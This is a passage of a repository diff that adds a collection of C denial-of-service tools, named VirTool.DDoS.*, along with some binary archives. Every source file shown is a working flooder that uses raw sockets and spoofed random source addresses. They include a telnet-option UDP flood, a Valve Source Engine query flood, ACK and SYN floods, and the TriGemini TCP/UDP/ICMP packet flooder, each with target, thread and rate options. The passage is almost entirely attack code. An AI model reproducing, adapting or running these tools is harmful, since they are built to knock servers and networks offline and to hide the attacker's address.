(random_num >> 8 & 0xFF) << 8 |
(random_num & 0xFF);
iph->saddr = ul_dst;
udph->source = htons(random_num & 0xFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
while(--throttle);
}
}
}
int main(int argc, char *argv[ ])
{
if(argc < 4){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <IP> <throttle> <threads> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons (rand() % 20480);
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];
int i;
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin = sin;
td[i].throttle = atoi(argv[2]);
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
}
fprintf(stdout, "Starting Flood...\n");
if(argc > 5)
{
sleep(atoi(argv[4]));
} else {
while(1){
sleep(1);
}
}
return 0;
}

BIN
libs/VirTool.DDoS.SYN.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.TCP.a Normal file
View File

Binary file not shown.

172
libs/VirTool.DDoS.TELNET.c Normal file
View File

@ -0,0 +1,172 @@
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 33;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
udph->source = htons(27015);
udph->dest = htons(27015);
udph->check = 0;
void *data = (void *)udph + sizeof(struct udphdr);
memset(data, 0xFF, 4);
strcpy(data+4, "\xff\xfb\x25\xff\xfd\x26\xff\xfb\x26\xff\xfd\x03\xff\xfb\x18\xff\xfb\x1f\xff\xfb\x20\xff\xfb\x21\xff\xfb\x22\xff\xfb\x27\xff\xfd\x05");
udph->len=htons(sizeof(struct udphdr) + 33);
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(17015);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Telnet Khaos\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

379
libs/VirTool.DDoS.TRIGIMINI.c Normal file
View File

@ -0,0 +1,379 @@
/*
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#ifdef F_PASS
#include <sys/stat.h>
#endif
#include <netinet/in_systm.h>
#include <sys/socket.h>
#include <string.h>
#include <time.h>
#include <signal.h>
#ifndef __USE_BSD
# define __USE_BSD
#endif
#ifndef __FAVOR_BSD
# define __FAVOR_BSD
#endif
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#ifdef LINUX
# define FIX(x) htons(x)
#else
# define FIX(x) (x)
#endif
#define TCP_ACK 1
#define TCP_FIN 2
#define TCP_SYN 4
#define TCP_RST 8
#define UDP_CFF 16
#define ICMP_ECHO_G 32
#define TCP_NOF 64
#define TCP_URG 128
#define TCP_PSH 258
#define TCP_ECE 512
#define TCP_CWR 1024
#define TH_NOF 0x0
#define TH_ECE 0x40
#define TH_CWR 0x80
#define TCP_ATTACK() (a_flags & TCP_ACK ||\
a_flags & TCP_FIN ||\
a_flags & TCP_SYN ||\
a_flags & TCP_RST ||\
a_flags & TCP_NOF ||\
a_flags & TCP_PSH ||\
a_flags & TCP_ECE ||\
a_flags & TCP_CWR ||\
a_flags & TCP_URG )
#define UDP_ATTACK() (a_flags & UDP_CFF)
#define ICMP_ATTACK() (a_flags & ICMP_ECHO_G)
#define CHOOSE_DST_PORT() dst_sp == 0 ?\
random () :\
htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
#define CHOOSE_SRC_PORT() src_sp == 0 ?\
random () :\
htons(src_sp + (random() % (src_ep -src_sp +1)));
#define SEND_PACKET() if (sendto(rawsock,\
&packet,\
(sizeof packet),\
0,\
(struct sockaddr *)&target,\
sizeof target) < 0) {\
perror("sendto");\
exit(-1);\
}
#define BANNER_CKSUM 54018
//#define BANNER_CKSUM 723
u_long lookup(const char *host);
unsigned short in_cksum(unsigned short *addr, int len);
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
char *class2ip(const char *class);
static void send_tcp(u_char th_flags);
static void send_udp(u_char garbage);
static void send_icmp(u_char garbage);
char *get_plain(const char *crypt_file, const char *xor_data_key);
static void usage(const char *argv0);
u_long dstaddr;
u_short dst_sp, dst_ep, src_sp, src_ep;
char *src_class, *dst_class;
int a_flags, rawsock;
struct sockaddr_in target;
struct pseudo_hdr {
u_long saddr, daddr;
u_char mbz, ptcl;
u_short tcpl;
};
struct cksum {
struct pseudo_hdr pseudo;
struct tcphdr tcp;
};
struct {
int gv;
int kv;
void (*f)(u_char);
} a_list[] = {
{ TCP_ACK, TH_ACK, send_tcp },
{ TCP_FIN, TH_FIN, send_tcp },
{ TCP_SYN, TH_SYN, send_tcp },
{ TCP_RST, TH_RST, send_tcp },
{ TCP_NOF, TH_NOF, send_tcp },
{ TCP_URG, TH_URG, send_tcp },
{ TCP_PSH, TH_PUSH, send_tcp },
{ TCP_ECE, TH_ECE, send_tcp },
{ TCP_CWR, TH_CWR, send_tcp },
{ UDP_CFF, 0, send_udp },
{ ICMP_ECHO_G, ICMP_ECHO, send_icmp },
{ 0, 0, (void *)NULL },
};
int
main(int argc, char *argv[])
{
int n, i, on = 1;
int b_link;
#ifdef F_PASS
struct stat sb;
#endif
unsigned int until;
a_flags = dstaddr = i = 0;
dst_sp = dst_ep = src_sp = src_ep = 0;
until = b_link = -1;
src_class = dst_class = NULL;
while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) {
char *p;
switch (n) {
case 'T':
switch (atoi(optarg)) {
case 0: a_flags |= TCP_ACK; break;
case 1: a_flags |= TCP_FIN; break;
case 2: a_flags |= TCP_RST; break;
case 3: a_flags |= TCP_SYN; break;
case 4: a_flags |= TCP_URG; break;
case 5: a_flags |= TCP_PSH; break;
case 6: a_flags |= TCP_ECE; break;
case 7: a_flags |= TCP_CWR; break;
}
break;
case 'U':
a_flags |= UDP_CFF;
break;
case 'I':
a_flags |= ICMP_ECHO_G;
break;
case 'N':
a_flags |= TCP_NOF;
break;
case 's':
src_class = optarg;
break;
case 'h':
dstaddr = lookup(optarg);
break;
case 'd':
dst_class = optarg;
i = 1;
break;
case 'p':
if ( (p = (char *) strchr(optarg, ',')) == NULL)
usage(argv[0]);
dst_sp = atoi(optarg);
dst_ep = atoi(p +1);
break;
case 'q':
if ( (p = (char *) strchr(optarg, ',')) == NULL)
usage(argv[0]);
src_sp = atoi(optarg);
src_ep = atoi(p +1);
break;
case 'l':
b_link = atoi(optarg);
if (b_link <= 0 || b_link > 100)
usage(argv[0]);
break;
case 't':
until = time(0) +atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if ( (!dstaddr && !i) ||
(dstaddr && i) ||
(!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
(src_sp != 0 && src_sp > src_ep) ||
(dst_sp != 0 && dst_sp > dst_ep))
usage(argv[0]);
srandom(time(NULL) ^ getpid());
if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}
if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
(char *)&on, sizeof(on)) < 0) {
perror("setsockopt");
exit(-1);
}
target.sin_family = AF_INET;
for (n = 0; ; ) {
if (b_link != -1 && random() % 100 +1 > b_link) {
if (random() % 200 +1 > 199)
usleep(1);
continue;
}
for (i = 0; a_list[i].f != NULL; ++i) {
if (a_list[i].gv & a_flags)
a_list[i].f(a_list[i].kv);
}
if (n++ == 100) {
if (until != -1 && time(0) >= until) break;
n = 0;
}
}
exit(0);
}
u_long
lookup(const char *host)
{
struct hostent *hp;
if ( (hp = gethostbyname(host)) == NULL) {
perror("gethostbyname");
exit(-1);
}
return *(u_long *)hp->h_addr;
}
#define RANDOM() (int) random() % 255 +1
char *
class2ip(const char *class)
{
static char ip[16];
int i, j;
for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i)
if (class[i] == '.')
++j;
switch (j) {
case 0:
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
break;
case 1:
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
break;
case 2:
sprintf(ip, "%s.%d", class, RANDOM());
break;
default: strncpy(ip, class, 16);
break;
}
return ip;
}
unsigned short
in_cksum(unsigned short *addr, int len)
{
int nleft = len;
int sum = 0;
unsigned short *w = addr;
unsigned short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(unsigned char *) (&answer) = *(unsigned char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return answer;
}
static void
inject_iphdr(struct ip *ip, u_char p, u_char len)
{
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_p = p;
ip->ip_tos = 0x08;
ip->ip_id = random();
ip->ip_len = len;
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_dst.s_addr = dst_class != NULL ?
inet_addr(class2ip(dst_class)) :
dstaddr;
ip->ip_src.s_addr = src_class != NULL ?
inet_addr(class2ip(src_class)) :
random();
target.sin_addr.s_addr = ip->ip_dst.s_addr;
}
static void
send_tcp(u_char th_flags)
{
struct cksum cksum;
struct packet {
struct ip ip;
struct tcphdr tcp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
cksum.pseudo.daddr = dstaddr;
cksum.pseudo.mbz = 0;
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));
cksum.pseudo.saddr = packet.ip.ip_src.s_addr;
packet.tcp.th_win = random();
packet.tcp.th_seq = random();
packet.tcp.th_ack = random();
packet.tcp.th_flags = th_flags;
packet.tcp.th_off = 5;
packet.tcp.th_urp = 0;
packet.tcp.th_sport = CHOOSE_SRC_PORT();
packet.tcp.th_dport = CHOOSE_DST_PORT();
cksum.tcp = packet.tcp;
packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
SEND_PACKET();
}
static void
send_udp(u_char garbage)
{
struct packet {
struct ip ip;
struct udphdr udp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
packet.udp.uh_sport = CHOOSE_SRC_PORT();
packet.udp.uh_dport = CHOOSE_DST_PORT();
packet.udp.uh_ulen = htons(sizeof packet.udp);
packet.udp.uh_sum = 0;
SEND_PACKET();
}
static void
send_icmp(u_char gargabe)
{
struct packet {
struct ip ip;
struct icmp icmp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
packet.icmp.icmp_type = ICMP_ECHO;
packet.icmp.icmp_code = 0;
packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
SEND_PACKET();
}
const char *banner = "TriGemini. [TCP/UDP/ICMP Packet flooder]";
static void
usage(const char *argv0)
{
printf("%s \n", banner);
printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
printf(" -T TCP attack \e[1;37m[\e[0m0:ACK 1: FIN\e[1;37m]\e[0m\n");
printf(" \e[1;37m[\e[0m2:RST 3: SYN\e[1;37m]\e[0m\n");
printf(" \e[1;37m[\e[0m4:URG 5:PUSH\e[1;37m]\e[0m\n");
printf(" \e[1;37m[\e[0m6:ECE 7: CWR\e[1;37m]\e[0m\n");
printf(" -h target host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n");
printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
printf("\e[1musage\e[0m: %s [-T0 -T1 -T2 -T3 -T4 -T5 -T6 -T7 -U -I] -h -t\n", argv0);
exit(-1);
}

BIN
libs/VirTool.DDoS.TS3.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.UDP.7z Normal file
View File

Binary file not shown.

176
libs/VirTool.DDoS.VSE.c Normal file
View File

@ -0,0 +1,176 @@
/*
* Valve Source Engine Layer 7 by LSDEV
*/
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 25;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
udph->source = htons(27015);
udph->dest = htons(27015);
udph->check = 0;
void *data = (void *)udph + sizeof(struct udphdr);
memset(data, 0xFF, 4);
strcpy(data+4, "TSource Engine Query");
udph->len=htons(sizeof(struct udphdr) + 25);
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(17015);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Valve Source Engine Layer 7 by LSDEV\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

BIN
libs/VirTool.DDoS.WIZARD.a Normal file
View File

Binary file not shown.

216
libs/VirTool.DDoS.XACK.c Normal file
View File

@ -0,0 +1,216 @@
/*
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 65534
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = rand();
tcph->seq = rand();
tcph->ack_seq = rand();
tcph->res2 = 0;
tcph->doff = 5;
tcph->ack = 1;
tcph->window = rand();
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = rand();
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = rand();
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stderr, "Improper ACK flood parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 100;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

BIN
libs/VirTool.DDoS.XMLRPC.7z Normal file
View File

Binary file not shown.

215
libs/VirTool.DDoS.XSYN.c Normal file
View File

@ -0,0 +1,215 @@
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <time.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
char ip[17];
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(rand()%54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr(ip);
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(rand()%65535);
tcph->seq = rand();
tcph->ack_seq = 0;
tcph->res2 = 0;
tcph->doff = 5;
tcph->syn = 1;
tcph->window = htonl(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
